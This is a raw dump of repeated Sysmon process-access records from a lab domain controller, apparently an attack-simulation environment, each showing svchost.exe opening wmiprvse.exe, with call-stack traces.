10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.167{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.151{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.151{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.151{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.026{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.026{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.026{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.010{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.010{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.010{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.010{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.010{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:59.010{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.995{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.995{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.995{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.995{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.995{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.995{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:58.979{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 